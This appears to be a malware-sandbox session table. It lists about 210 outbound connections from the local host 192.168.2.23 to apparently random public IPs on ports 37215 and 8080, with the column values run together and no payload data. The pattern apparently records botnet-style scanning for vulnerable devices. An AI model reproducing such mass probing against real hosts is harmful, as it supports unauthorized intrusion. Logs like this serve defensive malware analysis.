                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3546192.168.2.233768241.53.109.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3547192.168.2.2351658157.18.118.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3548192.168.2.2358004157.50.230.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3549192.168.2.234651294.48.195.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3550192.168.2.235677637.249.149.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3551192.168.2.2351232197.109.116.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3552192.168.2.234298688.245.246.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3553192.168.2.2345316193.138.51.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3554192.168.2.2346286113.4.12.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3555192.168.2.235606447.230.25.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3556192.168.2.2359268191.189.83.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3557192.168.2.2351418198.33.26.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3558192.168.2.2348464105.81.130.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3559192.168.2.234297413.85.71.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3560192.168.2.2338040123.147.155.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3561192.168.2.233959890.74.124.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3562192.168.2.2341764174.48.83.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3563192.168.2.2340312145.96.207.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3564192.168.2.2342822156.182.51.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3565192.168.2.2357062162.238.55.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3566192.168.2.234664651.29.239.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3567192.168.2.233305437.232.158.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3568192.168.2.2360798203.38.173.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3569192.168.2.2347588110.73.106.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3570192.168.2.234550881.140.184.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3571192.168.2.2347902211.57.124.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3572192.168.2.2343098144.245.153.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3573192.168.2.235940449.108.168.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3574192.168.2.23438268.95.57.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3575192.168.2.2353862197.32.81.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3576192.168.2.2341528118.26.239.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3577192.168.2.2353582175.168.2.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3578192.168.2.235532876.19.33.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3579192.168.2.235480477.88.50.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3580192.168.2.235535296.228.94.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3581192.168.2.235304089.27.250.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3582192.168.2.2356056198.128.181.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3583192.168.2.2355836172.60.167.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3584192.168.2.235334632.42.200.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3585192.168.2.234719668.35.172.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3586192.168.2.2350636162.152.104.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3587192.168.2.2335572138.159.230.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3588192.168.2.2338134197.132.30.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3589192.168.2.233445218.112.169.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3590192.168.2.2355800101.206.55.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3591192.168.2.234419089.231.83.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3592192.168.2.2359362104.63.209.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3593192.168.2.2341102152.169.182.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3594192.168.2.2355952191.138.1.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3595192.168.2.2338014197.90.143.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3596192.168.2.2360168132.166.208.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3597192.168.2.235030631.91.126.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3598192.168.2.23416761.22.221.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3599192.168.2.235379868.246.187.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3600192.168.2.2349420108.9.228.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3601192.168.2.2339146157.189.116.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3602192.168.2.234280080.18.187.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3603192.168.2.234668241.241.210.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3604192.168.2.235461841.212.107.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3605192.168.2.2336766157.70.174.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3606192.168.2.2333258157.141.215.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3607192.168.2.233996841.106.107.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3608192.168.2.2356350197.104.74.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3609192.168.2.2355750223.147.12.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3610192.168.2.2343774157.211.90.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3611192.168.2.234819881.111.243.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3612192.168.2.234354649.104.219.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3613192.168.2.2345656197.159.235.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3614192.168.2.2342538178.169.68.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3615192.168.2.2360304221.56.199.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3616192.168.2.2357830157.222.119.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3617192.168.2.234130241.93.212.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3618192.168.2.2340062197.88.88.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3619192.168.2.2351420197.97.136.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3620192.168.2.2350652157.229.147.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3621192.168.2.235827041.238.156.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3622192.168.2.2347918197.143.79.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3623192.168.2.233334441.200.182.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3624192.168.2.235981241.11.199.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3625192.168.2.234040041.236.38.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3626192.168.2.2353662157.161.12.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3627192.168.2.2343924157.9.220.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3628192.168.2.2336342185.130.251.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3629192.168.2.235784441.180.58.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3630192.168.2.233841041.212.25.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3631192.168.2.233852641.243.71.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3632192.168.2.2341724197.12.139.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3633192.168.2.2353700154.16.249.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3634192.168.2.234881441.190.85.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3635192.168.2.2338408156.157.44.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3636192.168.2.2342512197.178.209.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3637192.168.2.2333382197.9.252.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3638192.168.2.234551041.60.37.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3639192.168.2.2345072197.228.68.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3640192.168.2.235485641.219.169.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3641192.168.2.2344662148.70.9.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3642192.168.2.23457609.27.194.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3643192.168.2.2356470197.222.45.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3644192.168.2.234317669.152.21.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3645192.168.2.233966841.133.179.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3646192.168.2.2354182157.55.160.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3647192.168.2.2342580157.117.129.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3648192.168.2.234986841.21.88.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3649192.168.2.2334032105.29.35.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3650192.168.2.2351968197.223.128.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3651192.168.2.2349972157.172.142.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3652192.168.2.234754841.251.211.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3653192.168.2.234762841.192.101.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3654192.168.2.2358710157.3.223.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3655192.168.2.2340936164.220.127.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3656192.168.2.2345934157.212.175.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3657192.168.2.235431441.204.113.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3658192.168.2.2341200197.102.8.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3659192.168.2.234922041.162.240.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3660192.168.2.2337356162.195.90.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3661192.168.2.2356940197.235.1.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3662192.168.2.2349882197.237.254.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3663192.168.2.2352662190.50.50.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3664192.168.2.2338502157.190.29.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3665192.168.2.2359552197.213.156.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3666192.168.2.2333038197.182.179.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3667192.168.2.2348374157.182.139.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3668192.168.2.235577841.178.62.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3669192.168.2.2353140157.236.67.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3670192.168.2.2342006197.239.94.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3671192.168.2.2334290157.80.203.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3672192.168.2.2341884137.163.118.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3673192.168.2.235550241.137.244.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3674192.168.2.235337241.211.234.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3675192.168.2.2359812197.245.233.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3676192.168.2.235727441.107.69.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3677192.168.2.2360288157.90.46.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3678192.168.2.235613241.138.140.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3679192.168.2.233307041.190.75.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3680192.168.2.2356830157.36.158.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3681192.168.2.2345874147.248.255.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3682192.168.2.2335058157.200.235.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3683192.168.2.2348990157.242.241.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3684192.168.2.233620441.203.31.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3685192.168.2.2357962188.255.16.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3686192.168.2.2359762197.47.145.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3687192.168.2.233569081.181.96.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3688192.168.2.2347210108.249.219.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3689192.168.2.2356406168.187.185.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3690192.168.2.233446241.92.128.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3691192.168.2.2356706149.207.81.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3692192.168.2.233539080.49.132.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3693192.168.2.2335040125.199.11.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3694192.168.2.2349924115.206.239.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3695192.168.2.2340924121.65.133.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3696192.168.2.2336940139.110.172.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3697192.168.2.233308827.67.145.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3698192.168.2.234665860.71.45.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3699192.168.2.2339984188.38.9.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3700192.168.2.23558141.147.216.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3701192.168.2.2339292104.100.59.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3702192.168.2.233315086.120.59.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3703192.168.2.2342728124.251.176.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3704192.168.2.2359830212.248.224.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3705192.168.2.236013293.169.94.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3706192.168.2.2334628131.108.46.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3707192.168.2.2350436158.74.147.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3708192.168.2.2333866135.77.230.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3709192.168.2.235986292.245.82.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3710192.168.2.233763696.103.135.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3711192.168.2.235631088.60.56.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3712192.168.2.2343132160.230.23.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3713192.168.2.2358648108.126.242.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3714192.168.2.2339634114.91.122.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3715192.168.2.2351438192.94.176.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3716192.168.2.2359448188.39.99.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3717192.168.2.2340486165.42.122.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3718192.168.2.233853482.178.186.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3719192.168.2.2358286124.110.160.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3720192.168.2.234374075.132.169.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3721192.168.2.233850823.163.215.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3722192.168.2.2342772159.84.138.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3723192.168.2.2349650121.113.227.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3724192.168.2.2349178183.101.61.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3725192.168.2.233659858.81.156.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3726192.168.2.2338854126.169.136.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3727192.168.2.2359208212.97.114.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3728192.168.2.233901049.210.162.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3729192.168.2.2341332112.37.106.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3730192.168.2.234708672.124.92.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3731192.168.2.2337092216.14.178.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3732192.168.2.2358774135.77.63.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3733192.168.2.2333200211.118.5.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3734192.168.2.234378089.8.134.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3735192.168.2.2347912163.120.19.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3736192.168.2.2360712165.215.153.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3737192.168.2.234087666.180.78.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3738192.168.2.2344858160.226.245.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3739192.168.2.2359892103.87.148.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3740192.168.2.235430295.136.142.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3741192.168.2.234609849.39.236.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3742192.168.2.23528282.136.178.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3743192.168.2.234233870.79.144.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3744192.168.2.2357084152.219.190.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3745192.168.2.2335182220.219.180.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3746192.168.2.2339970201.118.173.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3747192.168.2.2335114182.6.75.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3748192.168.2.234626272.2.239.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3749192.168.2.2336414110.72.135.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3750192.168.2.2338820115.186.124.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3751192.168.2.2347378104.157.0.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3752192.168.2.2337740162.22.57.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3753192.168.2.2354872218.174.99.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3754192.168.2.234509264.234.49.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3755192.168.2.2351500162.138.75.1848080
                                                        TimestampBytes transferredDirectionData


